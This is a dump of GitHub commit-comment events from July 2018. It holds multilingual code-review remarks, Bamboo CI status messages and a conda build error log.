{"id":"8014701204","type":"CommitCommentEvent","actor":{"login":"Executioner1939"},"repo":{"name":"JPienaar1/trn-api-Address"},"payload":{"comment":{"id":29825064,"position":36,"line":41,"path":"src/main/scala/Handlers/Mongo.scala","commit_id":"860e0b204ccdc4532b13da0fc8edb6e42c5a1ddf","created_at":"2018-07-25T07:35:13Z","updated_at":"2018-07-25T07:35:13Z","author_association":"NONE","body":"Create a new instance of FindOneAndUpdateOptions(), and set the value to be returned to be the document after the update. Currently this will return the document before applying the update."}},"created_at":"2018-07-25T07:35:13Z"}
{"id":"8014703009","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29825068,"position":91,"line":120,"path":"Nianyi.js","commit_id":"b9a42ee9d590633ae0653109666d7eac5e6ac556","created_at":"2018-07-25T07:35:36Z","updated_at":"2018-07-25T07:35:36Z","author_association":"OWNER","body":"A lot of native constructors, will inject some \"internal slot\" to their instances, which will make any copies of them unable to work properly."}},"created_at":"2018-07-25T07:35:36Z"}
{"id":"8014703601","type":"CommitCommentEvent","actor":{"login":"MoustafaMohsen"},"repo":{"name":"MoustafaMohsen/islame-search"},"payload":{"comment":{"id":29825069,"position":null,"line":null,"path":null,"commit_id":"7a5edbf57617263c150ad1adf5defd69284e2172","created_at":"2018-07-25T07:35:45Z","updated_at":"2018-07-25T07:35:45Z","author_association":"OWNER","body":"added domain"}},"created_at":"2018-07-25T07:35:45Z"}
{"id":"8014705969","type":"CommitCommentEvent","actor":{"login":"WangNianyi2001"},"repo":{"name":"WangNianyi2001/Nianyi-s-JavaScript-Library"},"payload":{"comment":{"id":29825071,"position":96,"line":125,"path":"Nianyi.js","commit_id":"b9a42ee9d590633ae0653109666d7eac5e6ac556","created_at":"2018-07-25T07:36:15Z","updated_at":"2018-07-25T07:36:15Z","author_association":"OWNER","body":"Preventing infinite recursive calls."}},"created_at":"2018-07-25T07:36:15Z"}
{"id":"8014707910","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29825074,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T07:36:41Z","updated_at":"2018-07-25T07:36:41Z","author_association":"COLLABORATOR","body":"Also IMHO when we use log profiles in addition with LUT correction, we need those sliders to achieve better results."}},"created_at":"2018-07-25T07:36:41Z"}
{"id":"8014709983","type":"CommitCommentEvent","actor":{"login":"ffjjhfgjhrtuyruydfhgdc"},"repo":{"name":"ffjjhfgjhrtuyruydfhgdc/anti-spam"},"payload":{"comment":{"id":29825079,"position":null,"line":null,"path":null,"commit_id":"57ee3a19952ccf1b20b7ad66bd586db0f7171491","created_at":"2018-07-25T07:37:07Z","updated_at":"2018-07-25T07:37:07Z","author_association":"OWNER","body":"https://github.com/ffjjhfgjhrtuyruydfhgdc/anti-spam"}},"created_at":"2018-07-25T07:37:07Z"}
{"id":"8014710648","type":"CommitCommentEvent","actor":{"login":"namhv"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29825080,"position":17,"line":17,"path":"app/src/main/java/com/hai/note/activity/base/BaseActivity.java","commit_id":"1812d4a15c2f3d6081b770904f24a7b76a722eb5","created_at":"2018-07-25T07:37:15Z","updated_at":"2018-07-25T07:37:15Z","author_association":"COLLABORATOR","body":"Còn nhiều cách fix khác mà\r\n"}},"created_at":"2018-07-25T07:37:15Z"}
{"id":"8014712532","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29825085,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T07:37:42Z","updated_at":"2018-07-25T07:37:42Z","author_association":"COLLABORATOR","body":"Ektar LUT is great when used Cineon LOG as a source but needs some tweaking after applying it."}},"created_at":"2018-07-25T07:37:42Z"}
{"id":"8014713724","type":"CommitCommentEvent","actor":{"login":"GovindKalyanaMOJ"},"repo":{"name":"Pareis2/PareisPractise"},"payload":{"comment":{"id":29825088,"position":null,"line":null,"path":null,"commit_id":"6630e5e9328b49985add83c03cc17106e151a5e4","created_at":"2018-07-25T07:37:59Z","updated_at":"2018-07-25T07:37:59Z","author_association":"COLLABORATOR","body":"This is incorrect. Please go through this link - http://www.vogella.com/tutorials/JUnit/article.html or your preferred one similar to this and develop a good understanding before you write."}},"created_at":"2018-07-25T07:37:59Z"}
{"id":"8014717714","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825096,"position":15,"line":15,"path":"1/quadratic_equation_solutions.rb","commit_id":"116308d7d2f54446a0a6b540f1df36b7d6e5c159","created_at":"2018-07-25T07:38:55Z","updated_at":"2018-07-25T07:38:55Z","author_association":"NONE","body":"Тут и ниже: Лучше не делать вычислений в интерполяции. Это затрудняет чтение. Нужно записать вычесленный корень в переменную и лишь затем подставить ее в интерполяцию."}},"created_at":"2018-07-25T07:38:55Z"}
{"id":"8014719470","type":"CommitCommentEvent","actor":{"login":"amuammarzein"},"repo":{"name":"amuammarzein/firstgit"},"payload":{"comment":{"id":29825098,"position":1,"line":1,"path":"README.md","commit_id":"bb2a0969ebfce7389bd3a0411651f9d0e13638ba","created_at":"2018-07-25T07:39:20Z","updated_at":"2018-07-25T07:39:20Z","author_association":"OWNER","body":"wrong code"}},"created_at":"2018-07-25T07:39:20Z"}
{"id":"8014720323","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825102,"position":18,"line":18,"path":"1/quadratic_equation_solutions.rb","commit_id":"116308d7d2f54446a0a6b540f1df36b7d6e5c159","created_at":"2018-07-25T07:39:30Z","updated_at":"2018-07-25T07:39:30Z","author_association":"NONE","body":"Тут тоже самое. Нужны 2 переменные с корнями."}},"created_at":"2018-07-25T07:39:30Z"}
{"id":"8014722075","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825106,"position":52,"line":36,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T07:39:56Z","updated_at":"2018-07-25T07:39:56Z","author_association":"MEMBER","body":"remove this member array because we dont use it for any function "}},"created_at":"2018-07-25T07:39:56Z"}
{"id":"8014722285","type":"CommitCommentEvent","actor":{"login":"amjadkhan1995"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29825107,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T07:40:00Z","updated_at":"2018-07-25T07:40:00Z","author_association":"NONE","body":"Ok i will look at it again, thank you!"}},"created_at":"2018-07-25T07:40:00Z"}
{"id":"8014727462","type":"CommitCommentEvent","actor":{"login":"JayQianxuewei"},"repo":{"name":"JayQianxuewei/demo2"},"payload":{"comment":{"id":29825114,"position":null,"line":null,"path":null,"commit_id":"d7142c0c563989292dd833dc0bfe466f6b2d8eca","created_at":"2018-07-25T07:41:11Z","updated_at":"2018-07-25T07:41:11Z","author_association":"OWNER","body":"love me"}},"created_at":"2018-07-25T07:41:11Z"}
{"id":"8014730493","type":"CommitCommentEvent","actor":{"login":"yanggis"},"repo":{"name":"yanggis/ChinaTunnel"},"payload":{"comment":{"id":29825120,"position":null,"line":null,"path":null,"commit_id":"18f9364ab0d4205d5fba8fe9df90a72a6433036b","created_at":"2018-07-25T07:41:52Z","updated_at":"2018-07-25T07:41:52Z","author_association":"OWNER","body":"按遥控的ok键+返回键，然后插电开机，选择恢复出厂设置，回到以前的版本，然后再用此APP进行root，再禁用更新。"}},"created_at":"2018-07-25T07:41:52Z"}
{"id":"8014732569","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825127,"position":18,"line":18,"path":"1/quadratic_equation_solutions.rb","commit_id":"116308d7d2f54446a0a6b540f1df36b7d6e5c159","created_at":"2018-07-25T07:42:20Z","updated_at":"2018-07-25T07:42:20Z","author_association":"NONE","body":"И квадратный корень считается 2 раза. Его можно вычислить 1 раз, записать в переменную и подставить эту переменную 2 раза. Это сэкономит ресурсы (правда в данном случае незначительно, но в случае более ресурсо-затратных вычислений - это может дать прирост производительности)"}},"created_at":"2018-07-25T07:42:20Z"}
{"id":"8014733299","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29825130,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T07:42:28Z","updated_at":"2018-07-25T07:42:28Z","author_association":"COLLABORATOR","body":"We could add Cinelog-C as well, Andy gives the exact tone curve and primaries info for free:\r\n\r\nCinelog-C is what we've called the reference colorspace used for all our REC709 and Film Look Luts. It is a hybrid of Alexa Wide Gamut RGB primaries (D65 white) and Cineon Log transfer with the following parameters:-\r\n\r\n                                X             Y\r\nRED                   0.6840    0.3130\r\nGREEN              0.2210     0.8480\r\nBLUE                 0.0861    -0.1020\r\nWHITE               0.3127     0.3290\r\n\r\n(10bit values shown)\r\n(D min) ~1% Black Level                      95/1023\r\n2% Black reflectance                          180/1023\r\n90% reflectance White Level               685/1023\r\n18% reflectance Gray Level                445/1023\r\n"}},"created_at":"2018-07-25T07:42:28Z"}
{"id":"8014733851","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29825132,"position":29,"line":156,"path":"contracts/NextyBonus.sol","commit_id":"09285274167d6a3f03d0cf36390e13cdf5e40073","created_at":"2018-07-25T07:42:35Z","updated_at":"2018-07-25T07:42:35Z","author_association":"MEMBER","body":"how a member can see their details information from dapp?\r\n\r\nshould provide function for dapp to get member's detail information for fixed and bonus amount "}},"created_at":"2018-07-25T07:42:35Z"}
{"id":"8014734109","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825133,"position":19,"line":19,"path":"1/quadratic_equation_solutions.rb","commit_id":"116308d7d2f54446a0a6b540f1df36b7d6e5c159","created_at":"2018-07-25T07:42:39Z","updated_at":"2018-07-25T07:42:39Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-25T07:42:39Z"}
{"id":"8014738357","type":"CommitCommentEvent","actor":{"login":"PREMjITHT"},"repo":{"name":"linux4wilc/driver"},"payload":{"comment":{"id":29825139,"position":null,"line":null,"path":null,"commit_id":"0559b98c8dfc55208d8a64d584a4a6b15f605a74","created_at":"2018-07-25T07:43:36Z","updated_at":"2018-07-25T07:43:36Z","author_association":"NONE","body":"sir,\r\nIs it support both BLE and BT  ?"}},"created_at":"2018-07-25T07:43:36Z"}
{"id":"8014748449","type":"CommitCommentEvent","actor":{"login":"terrytang0702"},"repo":{"name":"terrytang0702/testing"},"payload":{"comment":{"id":29825177,"position":null,"line":null,"path":null,"commit_id":"de1cc96ca6270df5bd33358a7badf20c1d1a67a2","created_at":"2018-07-25T07:45:53Z","updated_at":"2018-07-25T07:45:53Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-25T07:45:53Z"}
{"id":"8014754748","type":"CommitCommentEvent","actor":{"login":"beheh"},"repo":{"name":"HearthSim/hsredshift"},"payload":{"comment":{"id":29825186,"position":null,"line":null,"path":null,"commit_id":"8cd24b7ffdc912d3fc59a4e1bc60431783d63a04","created_at":"2018-07-25T07:47:21Z","updated_at":"2018-07-25T07:47:21Z","author_association":"MEMBER","body":"This commit is no longer running the primary tests, only the UDF ones. In addition, it leads to a number of Git errors during install."}},"created_at":"2018-07-25T07:47:21Z"}
{"id":"8014758155","type":"CommitCommentEvent","actor":{"login":"bakersdozen"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29825196,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-25T07:48:09Z","updated_at":"2018-07-25T07:48:09Z","author_association":"NONE","body":"I would love to see MLVApp honor the hard work Andy has put into cinelog-c . We could go straight to cinelog-c intermediates via this one stop shop. I am sure all of the cinelog-c heads would appreciate it very much."}},"created_at":"2018-07-25T07:48:09Z"}
{"id":"8014759455","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825199,"position":8,"line":8,"path":"1/right_triangle.rb","commit_id":"f7ba953fe24675ba7cf3921b7a9fd877c5b9faed","created_at":"2018-07-25T07:48:25Z","updated_at":"2018-07-25T07:48:25Z","author_association":"NONE","body":"Знаю, что мы не учили массивы, но рекомендую использовать тут массив. Его легко отсортировать используя метод sort.\r\n```\r\nsides = [a, b, c].sort!\r\n```"}},"created_at":"2018-07-25T07:48:25Z"}
{"id":"8014760654","type":"CommitCommentEvent","actor":{"login":"romanbetik"},"repo":{"name":"romanbetik/RomanBetik.HomeOrganizer"},"payload":{"comment":{"id":29825203,"position":null,"line":null,"path":null,"commit_id":"8a26944b3db6942c3ae14798e562293eb86af03f","created_at":"2018-07-25T07:48:41Z","updated_at":"2018-07-25T07:48:41Z","author_association":"OWNER","body":"Test https://github.com/romanbetik/RomanBetik.HomeOrganizer/projects/1#card-11598652"}},"created_at":"2018-07-25T07:48:41Z"}
{"id":"8014765584","type":"CommitCommentEvent","actor":{"login":"xnBal"},"repo":{"name":"xnBal/pcap_test"},"payload":{"comment":{"id":29825219,"position":145,"line":145,"path":"main.cpp","commit_id":"dd3fd0b8e1d941b62ccb2f3896622ffff2544a1d","created_at":"2018-07-25T07:49:49Z","updated_at":"2018-07-25T07:49:49Z","author_association":"OWNER","body":"fixed: https://github.com/xnBal/pcap_test/commit/40bbafddcfdd65ab95f42127c9f048cbcb90802c"}},"created_at":"2018-07-25T07:49:49Z"}
{"id":"8014765816","type":"CommitCommentEvent","actor":{"login":"wusw"},"repo":{"name":"wusw/mainfest"},"payload":{"comment":{"id":29825220,"position":null,"line":null,"path":null,"commit_id":"c885c29fe8d3fb92ad1081fe90d2c2e3dc618a0f","created_at":"2018-07-25T07:49:51Z","updated_at":"2018-07-25T07:49:51Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-25T07:49:51Z"}
{"id":"8014766858","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29825221,"position":null,"line":null,"path":null,"commit_id":"b9992f4a08574efb47b6e6cd80eb1e888b9a1ede","created_at":"2018-07-25T07:50:06Z","updated_at":"2018-07-25T07:50:06Z","author_association":"MEMBER","body":"补一个测试吧。"}},"created_at":"2018-07-25T07:50:06Z"}
{"id":"8014773578","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825238,"position":31,"line":31,"path":"1/right_triangle.rb","commit_id":"f7ba953fe24675ba7cf3921b7a9fd877c5b9faed","created_at":"2018-07-25T07:51:36Z","updated_at":"2018-07-25T07:51:36Z","author_association":"NONE","body":"По ТЗ\r\nТакже, если треугольник является при этом равнобедренным.\r\n\r\nСогласен, что это не так очевидно, но слова \"также... при этом\" подразумевают, что проверку на равнобедернность нужно осуществлять только для прямоугольного треугольника"}},"created_at":"2018-07-25T07:51:36Z"}
{"id":"8014776107","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29825247,"position":6,"line":6,"path":"1/right_triangle.rb","commit_id":"f7ba953fe24675ba7cf3921b7a9fd877c5b9faed","created_at":"2018-07-25T07:52:09Z","updated_at":"2018-07-25T07:52:09Z","author_association":"NONE","body":"тут нужно будет использовать to_f и поправить индентацию во всем файле"}},"created_at":"2018-07-25T07:52:09Z"}
{"id":"8014778694","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825253,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-25T07:52:42Z","updated_at":"2018-07-25T07:52:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:52:42Z"}
{"id":"8014778943","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29825255,"position":24,"line":24,"path":"homework8/Task1/task1.java","commit_id":"07cee9d699a34777f5fcba12390aca1fc55ae52d","created_at":"2018-07-25T07:52:45Z","updated_at":"2018-07-25T07:52:45Z","author_association":"OWNER","body":"краще використовувати StrinBuilder, він скорший"}},"created_at":"2018-07-25T07:52:45Z"}
{"id":"8014781547","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825261,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-25T07:53:21Z","updated_at":"2018-07-25T07:53:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:53:21Z"}
{"id":"8014782577","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29825264,"position":null,"line":null,"path":null,"commit_id":"45cdc5db38a02ac068e64d3607484e928f88f3c0","created_at":"2018-07-25T07:53:35Z","updated_at":"2018-07-25T07:53:35Z","author_association":"OWNER","body":"Tag #673"}},"created_at":"2018-07-25T07:53:35Z"}
{"id":"8014783895","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825265,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-25T07:53:53Z","updated_at":"2018-07-25T07:53:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:53:53Z"}
{"id":"8014784347","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29825266,"position":17,"line":17,"path":"homework8/Task2/task2.java","commit_id":"07cee9d699a34777f5fcba12390aca1fc55ae52d","created_at":"2018-07-25T07:53:58Z","updated_at":"2018-07-25T07:53:58Z","author_association":"OWNER","body":"подивись до методів класу String - replace() and replaceAll()\r\nцю заміну можна зробити простіше"}},"created_at":"2018-07-25T07:53:58Z"}
{"id":"8014786933","type":"CommitCommentEvent","actor":{"login":"smithsp"},"repo":{"name":"smithsp/staged-recipes"},"payload":{"comment":{"id":29825268,"position":null,"line":null,"path":null,"commit_id":"61617071bff8667fed6cf41e9c56556f6b382c78","created_at":"2018-07-25T07:54:30Z","updated_at":"2018-07-25T07:54:30Z","author_association":"OWNER","body":"@orso82 I tried Jonathan's recipe, included in this commit, and its parent.\r\n\r\nThis is still failing the import test:\r\n\r\n```\r\nimport: u'pyuda'\r\nTraceback (most recent call last):\r\n  File \"/cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/test_tmp/run_test.py\", line 2, in <module>\r\n    import pyuda\r\n  File \"/cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/_test_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_/lib/python2.7/site-packages/pyuda/__init__.py\", line 5, in <module>\r\n    from . import c_uda\r\n  File \"/cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/_test_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_/lib/python2.7/site-packages/pyuda/c_uda.py\", line 17, in <module>\r\n    _c_uda = swig_import_helper()\r\n  File \"/cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/_test_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_/lib/python2.7/site-packages/pyuda/c_uda.py\", line 16, in swig_import_helper\r\n    return importlib.import_module('_c_uda')\r\n  File \"/cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/_test_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_/lib/python2.7/importlib/__init__.py\", line 37, in import_module\r\n    __import__(name)\r\nImportError: /cluster-scratch/smithsp/conda-bld/pyuda_1532502722495/_test_env_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_placehold_/lib/python2.7/site-packages/_c_uda.so: undefined symbol: uda_memstream\r\nTests failed for pyuda-2.1.1-py27_0.tar.bz2 - moving package to /cluster-scratch/smithsp/conda-bld/broken\r\nWARNING:conda_build.build:Tests failed for pyuda-2.1.1-py27_0.tar.bz2 - moving package to /cluster-scratch/smithsp/conda-bld/broken\r\nremoving: pyuda-2.1.1-py27_0.tar.bz2\r\nTESTS FAILED: pyuda-2.1.1-py27_0.tar.bz2\r\n```"}},"created_at":"2018-07-25T07:54:30Z"}
{"id":"8014787045","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825269,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-25T07:54:31Z","updated_at":"2018-07-25T07:54:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:54:31Z"}
{"id":"8014789539","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825276,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T07:55:04Z","updated_at":"2018-07-25T07:55:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:55:04Z"}
{"id":"8014789791","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29825277,"position":13,"line":13,"path":"homework8/Task3/task3.java","commit_id":"07cee9d699a34777f5fcba12390aca1fc55ae52d","created_at":"2018-07-25T07:55:07Z","updated_at":"2018-07-25T07:55:07Z","author_association":"OWNER","body":"\\\\$(\\\\d*)+\\\\.\\\\d{2}"}},"created_at":"2018-07-25T07:55:07Z"}
{"id":"8014791061","type":"CommitCommentEvent","actor":{"login":"Ohanseok"},"repo":{"name":"Ohanseok/Hello-world"},"payload":{"comment":{"id":29825285,"position":null,"line":null,"path":null,"commit_id":"e2f0241df9eea2d38be338f5d81747b1d95a649b","created_at":"2018-07-25T07:55:23Z","updated_at":"2018-07-25T07:55:23Z","author_association":"OWNER","body":"oh~ Good~"}},"created_at":"2018-07-25T07:55:23Z"}
{"id":"8014792608","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825288,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-25T07:55:42Z","updated_at":"2018-07-25T07:55:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:55:42Z"}
{"id":"8014794968","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825294,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-25T07:56:14Z","updated_at":"2018-07-25T07:56:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:56:14Z"}
